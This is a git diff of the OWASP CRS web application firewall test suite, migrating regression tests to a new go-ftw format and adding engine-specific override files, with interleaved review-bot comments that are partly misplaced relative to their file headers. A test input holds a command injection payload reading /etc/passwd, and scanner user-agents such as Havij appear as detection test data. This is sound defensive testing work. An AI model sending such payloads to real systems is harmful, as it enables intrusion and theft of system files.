diff --git a/.github/ISSUE_TEMPLATE/config.yml b/.github/ISSUE_TEMPLATE/config.yml index 3b47fbf3d..73951bb2c 100644 --- a/.github/ISSUE_TEMPLATE/config.yml +++ b/.github/ISSUE_TEMPLATE/config.yml @@ -1,8 +1,8 @@ blank_issues_enabled: false contact_links: - name: Help and support - url: https://security.stackexchange.com/questions/tagged/owasp-crs + url: https://security.stackexchange.com/questions/tagged/owasp-crs about: For help and support please go here. - name: OWASP Core Rule Set mailing list - url: https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project + url: https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project about: Ask general usage questions and participate in discussions on the CRS. diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 72c42f930..7bfb86101 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -16,7 +16,7 @@ on: # Pin tool versions to prevent problems env: - GO_FTW_VERSION: '0.6.4' + GO_FTW_VERSION: '1.0.3' jobs: regression: 
@@ -36,16 +36,22 @@ jobs: -p "ftw_${{ env.GO_FTW_VERSION }}_linux_amd64.tar.gz" -O - | tar -xzvf - ftw - name: "Run tests for ${{ matrix.modsec_version }}" - env: - FTW_LOGFILE: './tests/logs/${{ matrix.modsec_version }}/error.log' run: | mkdir -p "tests/logs/${{ matrix.modsec_version }}/{nginx,apache2}" chmod -R o+rw "tests/logs" docker-compose -f ./tests/docker-compose.yml up -d "${{ matrix.modsec_version }}" docker-compose -f ./tests/docker-compose.yml logs - [ "$(docker inspect ${{ matrix.modsec_version }} --format='{{.State.Running}}')" = "true" ] + if ! [ "$(docker inspect ${{ matrix.modsec_version }} --format='{{.State.Running}}')" = "true" ]; then + echo "Web server failed to start. Aborting." + exit 1 + fi + ./ftw check -d tests/regression/tests - ./ftw run -d tests/regression/tests --show-failures-only + ./ftw run \ + -d tests/regression/tests \ + --log-file "tests/logs/${{ matrix.modsec_version }}/error.log" \ + --overrides tests/regression/httpd-overrides.yaml \ + --show-failures-only - name: "Change permissions if failed" if: failure() diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 4a3e4b5b7..d556c40e4 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md 
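Review bot: The new `./ftw run` invocation hard-codes `--overrides tests/regression/httpd-overrides.yaml` for every `matrix.modsec_version` entry, while the `mkdir -p` two lines above prepares both `nginx` and `apache2` log directories and this same commit adds `nginx-overrides.yaml` and `coraza-overrides.yaml`. If the matrix contains a non-httpd engine (which the nginx log directory suggests), that job runs with Apache-specific expectations such as the `expect_error: true` entry for 920390, and the engine's own override file is never exercised in CI, so engine-specific regressions could be misreported in either direction. Consider selecting the file from the matrix instead, e.g. a constructed matrix key `overrides` holding the file name and `--overrides "tests/regression/${{ matrix.overrides }}"`. The enclosing `steps` list starts and ends outside this hunk.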
@@ -372,23 +372,23 @@ Documentation on how to run the CRS test suite can be found in the [online docum Example of a simple *positive test*: ```yaml -- test_title: 932230-26 +- test_id: 26 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=` /bin/cat /etc/passwd`" - version: HTTP/1.1 - output: - log_contains: id "932230" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=` /bin/cat /etc/passwd`" + version: HTTP/1.1 + output: + log: + expect_ids: [932230] ``` This test will succeed if the log output contains `id "932230"`, which would indicate that the rule in question matched and generated an alert. 
@@ -402,21 +402,21 @@ The rule's description field, `desc`, is important. It should describe what is b Example of a simple *negative test*: ```yaml -- test_title: 932260-4 +- test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'foo=ping pong tables' - uri: '/post' - output: - no_log_contains: id "932260" + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'foo=ping pong tables' + uri: '/post' + output: + log: + no_expect_ids: [932260] ``` This test will succeed if the log output does **not** contain `id "932260"`, which would indicate that the rule in question did **not** match and so did **not** generate an alert. diff --git a/tests/regression/README.md b/tests/regression/README.md index 540fabc56..7c8cb0e1e 100644 --- a/tests/regression/README.md +++ b/tests/regression/README.md 
@@ -15,22 +15,22 @@ The OWASP CRS project was part of the effort to develop the Web Application Fire --- meta: author: "csanders-git" - enabled: true name: "911100.yaml" - description: "Description" + description: "A meaningful description" + rule_id: 911100 tests: - - test_title: 911100-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - output: - no_log_contains: "id \"911100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + log: + expect_id: 911100 ``` For go-ftw, please check out from [go-ftw releases page](https://github.com/coreruleset/go-ftw/releases). diff --git a/tests/regression/coraza-overrides.yaml b/tests/regression/coraza-overrides.yaml new file mode 100644 index 000000000..39373d99f --- /dev/null +++ b/tests/regression/coraza-overrides.yaml 
@@ -0,0 +1,52 @@
+version: "v0.0.0"
+meta:
+  engine: "coraza"
+  platform: "go"
+  annotations:
+    - purpose: "CRS test suite"
+test_overrides:
+  - rule_id: 920100
+    test_ids: [4]
+    reason: 'Invalid uri, Coraza not reached - 404 page not found'
+    output:
+      status: 404
+  - rule_id: 920100
+    test_ids: [5]
+    reason: 'Invalid uri, Coraza not reached - 404 page not found'
+    output:
+      status: 404
+  - rule_id: 920100
+    test_ids: [8]
+    reason: 'Go/http allows a colon in the path. Test expects status 400 or 403 (Apache behaviour)'
+    output:
+      status: 200
+      log:
+        expect_ids: [920100]
+  - rule_id: 920270
+    test_ids: [4]
+    reason: 'Rule works, log contains 920270. Test expects status 400 (Apache behaviour)'
+    output:
+      status: 200
+  - rule_id: 920272
+    test_ids: [5]
+    reason: 'Rule works, log contains 920272. Test expects status 400 (Apache behaviour)'
+    output:
+      status: 200
+  - rule_id: 920290
+    test_ids: [1]
+    reason: 'Rule works, log contains 920290. Test expects status 400 (Apache behaviour)'
+    output:
+      status: 200
+  - rule_id: 920430
+    test_ids: [8]
+    reason: 'Go/http does not allow HTTP/3.0 - 505 HTTP Version Not Supported'
+    output:
+      status: 505
+      log:
+        no_expect_ids: [920430]
+  - rule_id: 932200
+    test_ids: [13]
+    reason: 'wip'
+  - rule_id: 934131
+    test_ids: [5, 7]
+    reason: 'TODO: check why we are failing to deobfuscate these payloads'
diff --git a/tests/regression/httpd-overrides.yaml b/tests/regression/httpd-overrides.yaml
new file mode 100644
index 000000000..19c3a957e
--- /dev/null
+++ b/tests/regression/httpd-overrides.yaml
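Review bot: The two 920100 entries for `test_ids: [4]` and `test_ids: [5]` carry the same reason and the same `output` and could be a single entry `test_ids: [4, 5]`, matching how the 934131 entry at the end of the file is written. Separately, the 932200 and 934131 entries have no `output` block, so what the override does to those tests (skip them, or accept any result) is not visible from this file. If it disables them, a reason of `'wip'` gives a future reader nothing to act on; a reason of the form `'wip: <what is being investigated>, tracked in <issue URL placeholder>'` (constructed example) keeps the disabled coverage from being forgotten.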
@@ -0,0 +1,35 @@
+version: "v0.0.0"
+meta:
+  engine: "ModSecurity v2"
+  platform: "httpd"
+  annotations:
+    - purpose: "CRS test suite"
+test_overrides:
+  - rule_id: 920360
+    test_ids: [1]
+    reason: Requires ARG_NAME_LENGTH to be set to an appropriately low value
+    output:
+      status: 200
+      log:
+        no_expect_ids: [920360]
+  - rule_id: 920370
+    test_ids: [1]
+    reason: Doesn't trigger. Needs to be fixed (https://github.com/coreruleset/coreruleset/issues/3745)
+    output:
+      status: 200
+      log:
+        no_expect_ids: [920370]
+  - rule_id: 920380
+    test_ids: [1]
+    reason: Requires MAX_NUM_ARGS to be set to a sufficiently low value
+    output:
+      status: 200
+      log:
+        no_expect_ids: [920380]
+  - rule_id: 920390
+    test_ids: [1]
+    reason: Exceeds PCRE limits, currently segfaults on the CI
+    output:
+      expect_error: true
+      log:
+        no_expect_ids: [920390]
diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml
new file mode 100644
index 000000000..d2b1fe98f
--- /dev/null
+++ b/tests/regression/nginx-overrides.yaml
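Review bot: The 920390 entry accepts a crash as the expected outcome (`expect_error: true`, reason `currently segfaults on the CI`), but unlike the 920370 entry directly above it, it does not point at a tracking issue, so the masked crash is easy to lose once CI is green. Suggest extending the reason along the lines of `reason: Exceeds PCRE limits, currently segfaults on the CI (tracked in <issue URL placeholder>)` and, if no issue exists yet, opening one before merging. A crash of the engine process on one specific test input is worth tracking independently of the test-format migration this commit performs.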
@@ -0,0 +1,178 @@
+version: "v0.0.0"
+meta:
+  engine: "libmodsecurity3"
+  platform: "nginx"
+  annotations:
+    - os: "Debian Bullseye"
+    - purpose: "CRS test suite"
+test_overrides:
+  - rule_id: 920100
+    test_ids: [4]
+    reason: "Nginx returns a 400 bad request"
+    output:
+      status: 400
+  - rule_id: 920100
+    test_ids: [8]
+    reason: |
+      On Apache is not allowed to put a colon in the path.
+      Nginx, on the other hand, allows it, in this case, returns a 200. /index.html:80?I=Like&Apples=Today#tag.
+      Note that the colon is a legal character in a regular path segment, according to the RFC.
+    output:
+      status: 200
+      log:
+        no_expect_ids: [920100]
+  - rule_id: 920100
+    test_ids: [14]
+    reason: "Invalid request line produces a 400 Bad Request on Nginx. This prevents matching any rules."
+    output:
+      status: 400
+  - rule_id: 920100
+    test_ids: [16]
+    reason: "Seems like Nginx does a normalization of the request line, and if :// is sent (without a path) the request path becomes / by default"
+    output:
+      log:
+        no_expect_ids: [920100]
+  - rule_id: 920181
+    test_ids: [1]
+    reason: "Nginx returns 400 if both Content-length and Transfer-Encoding chunked are present"
+    output:
+      status: 400
+  - rule_id: 920260
+    test_ids: [1, 3]
+    reason: |
+      Nginx replaces the `%u` in the URI with `\xf`. This might be a bug.
+      See https://github.com/owasp-modsecurity/ModSecurity/issues/3135
+    output:
+      status: 200
+      log:
+        no_expect_ids: [920260]
+  - rule_id: 920270
+    test_ids: [4]
+    reason: "Header host with null byte causes Apache to error before it gets to CRS. Nginx allow this and libModSecurity correctly matches the rule"
+    output:
+      status: 200
+      log:
+        expect_ids: [920270]
+  - rule_id: 920274
+    test_ids: [1]
+    reason: "Nginx will accept the value for the Host header, the rule should trigger"
+    output:
+      status: 200
+      log:
+        expect_ids: [920274]
+  - rule_id: 920290
+    test_ids: [4]
+    reason: "Nginx returns 400 if Host header is missing"
+    output:
+      status: 400
+  - rule_id: 920360
+    test_ids: [1]
+    reason: Requires ARG_NAME_LENGTH to be set to an appropriately low value
+    output:
+      status: 200
+      log:
+        no_expect_ids: [920360]
+  - rule_id: 920370
+    test_ids: [1]
+    reason: Exceeds PCRE limits
+    output:
+      status: 200
+      log:
+        no_expect_ids: [920360]
+  - rule_id: 920380
+    test_ids: [1]
+    reason: Requires MAX_NUM_ARGS to be set to a sufficiently low value
+    output:
+      status: 200
+      log:
+        no_expect_ids: [920280]
+  - rule_id: 920390
+    test_ids: [1]
+    reason: Exceeds PCRE limits
+    output:
+      status: 200
+      log:
+        no_expect_ids: [920390]
+  - rule_id: 920430
+    test_ids: [8]
+    reason: "If the HTTP Protocol Version is invalid, Nginx take action before modsecurity sending a 505 response code."
+    output:
+      status: 505
+  - rule_id: 920610
+    test_ids: [2]
+    reason: "nginx happily accepts fragments"
+    output:
+      status: 200
+      log:
+        expect_ids: [920610]
+  - rule_id: 920620
+    test_ids: [1]
+    reason: "nginx retains multiple separate Content-Type headers, which is what this rule is looking for"
+    output:
+      log:
+        expect_ids: [920620]
+  - rule_id: 930110
+    test_ids: [7]
+    reason: "nginx does not strip the dots from the URL (which httpd apparently does), hence ModSecurity sees them and the rule matches"
+    output:
+      log:
+        expect_ids: [930110]
+  - rule_id: 933110
+    test_ids: [3, 13, 14, 20, 21, 22, 24, 25, 26, 27]
+    reason: "Nginx ignore by default request header with invalid characters (like X_Filename)"
+    output:
+      log:
+        no_expect_ids: [9331110]
+  - rule_id: 934131
+    test_ids: [5]
+    reason: "The problem here is how the rules tfunc works on nginx. Waiting for a decision here: https://github.com/coreruleset/coreruleset/issues/3376"
+    output:
+      expect_error: true
+  - rule_id: 934131
+    test_ids: [7]
+    reason: "The problem here is how the rules tfunc works on nginx. Waiting for a decision here: https://github.com/coreruleset/coreruleset/issues/3376"
+    output:
+      expect_error: true
+  - rule_id: 942131
+    test_ids: [3, 5, 7]
+    reason: "v3 log bug, the first part of the chain always produces a log"
+    output:
+      log:
+        expect_ids: [942131]
+  - rule_id: 944100
+    test_ids: [11, 12, 15, 16]
+    reason: "`REQUEST_BODY` is always present, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
+    output:
+      log:
+        expect_ids: [944100]
+  - rule_id: 944110
+    test_ids: [11, 12, 15, 16]
+    reason: "`REQUEST_BODY` is always present, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
+    output:
+      log:
+        expect_ids: [944110]
+  - rule_id: 944120
+    test_ids: [6, 7, 23, 24, 40, 41, 57, 58, 74, 75, 91, 92, 108, 109, 125, 126]
+    reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
+    output:
+      log:
+        expect_ids: [944120]
+  - rule_id: 944140
+    test_ids: [3, 8]
+    reason: "The header name `X_Filename` is considered invalid and is removed by nginx"
+    output:
+      status: 200
+      log:
+        no_expect_ids: [944140]
+  - rule_id: 944210
+    test_ids: [6, 7, 23, 24, 40, 41]
+    reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
+    output:
+      log:
+        expect_ids: [944210]
+  - rule_id: 980170
+    test_ids: [1, 2]
+    reason: "libmodsecurity3 does not make any log entry about rule triggering in error.log if the rule has `noauditlog` action, like 980170"
+    output:
+      log:
+        no_expect_ids: [980170]
diff --git a/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml b/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml
index 49387c8c3..371b6ea40 100644
--- a/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml
+++ b/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml
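Review bot: Three overrides assert the absence of an ID that does not match their own `rule_id`: the 920370 entry has `no_expect_ids: [920360]`, the 920380 entry has `no_expect_ids: [920280]`, and the 933110 entry has `no_expect_ids: [9331110]`. Given the documented semantics of this check (the test passes when the listed ID is absent from the log), a `no_expect_ids` on an unrelated or non-existent ID is satisfied trivially, so these three entries no longer verify anything about the rule they override and a regression in 920370, 920380 or 933110 on nginx would go unnoticed. They should read `no_expect_ids: [920370]`, `no_expect_ids: [920380]` and `no_expect_ids: [933110]` respectively. A small consistency check in the test tooling that every `expect_ids`/`no_expect_ids` value equals the entry's `rule_id` would catch this class of copy-paste error in future override files.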
@@ -1,144 +1,142 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "911100.yaml" - description: "Description" +rule_id: 911100 tests: - - test_title: 911100-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "GET" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: "id \"911100\"" - - test_title: 911100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [911100] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "OPTIONS" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/options" - version: "HTTP/1.1" - output: - no_log_contains: "id \"911100\"" - - test_title: 911100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "OPTIONS" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/options" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [911100] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "HEAD" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/head" - version: "HTTP/1.1" - output: - no_log_contains: "id \"911100\"" - - test_title: 911100-4 + - input: + dest_addr: 
"127.0.0.1" + method: "HEAD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/head" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [911100] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "test=value" - version: "HTTP/1.1" - output: - no_log_contains: "id \"911100\"" - - test_title: 911100-5 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "test=value" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [911100] + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "TEST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/test" - version: "HTTP/1.1" - output: - log_contains: "id \"911100\"" - - test_title: 911100-6 + - input: + dest_addr: "127.0.0.1" + method: "TEST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/test" + version: "HTTP/1.1" + output: + log: + expect_ids: [911100] + - test_id: 6 desc: Method is not allowed by policy (911100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: DELETE - port: 80 - uri: "/delete" - version: HTTP/1.0 - output: - log_contains: id "911100" - - test_title: 911100-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: DELETE + port: 80 + uri: "/delete" + version: HTTP/1.0 + output: + log: + expect_ids: [911100] + - test_id: 7 desc: Method is not allowed by policy (911100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: FOO - port: 80 - uri: "/foo" - version: HTTP/1.0 - output: - log_contains: id "911100" - - test_title: 911100-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: FOO + port: 80 + uri: "/foo" + version: HTTP/1.0 + output: + log: + expect_ids: [911100] + - test_id: 8 desc: Method is not allowed by policy (911100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: SUBSCRIBE - port: 80 - uri: "/subscribe" - version: HTTP/1.0 - output: - log_contains: id "911100" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: SUBSCRIBE + port: 80 + uri: "/subscribe" + version: HTTP/1.0 + output: + log: + expect_ids: [911100] diff --git a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml index 0ba29d89d..f7ec8046b 100644 --- a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml +++ b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml 
@@ -1,131 +1,129 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 913100.yaml +rule_id: 913100 tests: - - test_title: 913100-1 + - test_id: 1 desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "913100" - - test_title: 913100-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [913100] + - test_id: 2 desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: Arachni/0.2.1 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "913100" - - test_title: 913100-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: Arachni/0.2.1 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [913100] + - test_id: 3 desc: Request Indicates a Security Scanner Scanned the Site (913100) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: nuclei - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "913100" - - test_title: 913100-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: nuclei + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [913100] + - test_id: 4 desc: "Scanner identification based on User-agent field" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "nessus" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "913100" - - test_title: 913100-5 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "nessus" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + 
log: + expect_ids: [913100] + - test_id: 5 desc: "YUM package manager allow list" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "urlgrabber/3.10 yum/3.4.3" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "913100" - - test_title: 913100-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "urlgrabber/3.10 yum/3.4.3" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [913100] + - test_id: 6 desc: "ZGrab" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "Mozilla/5.0 zgrab/0.x" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "913100" - - test_title: 913100-7 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "Mozilla/5.0 zgrab/0.x" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [913100] + - test_id: 7 desc: "eCairn allow list" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "mozilla/5.0 ecairn-grabber/1.0 (+http://ecairn.com/grabber)" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "913100" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "mozilla/5.0 
ecairn-grabber/1.0 (+http://ecairn.com/grabber)" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [913100] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml index 6f26735a0..74d0073f8 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml 
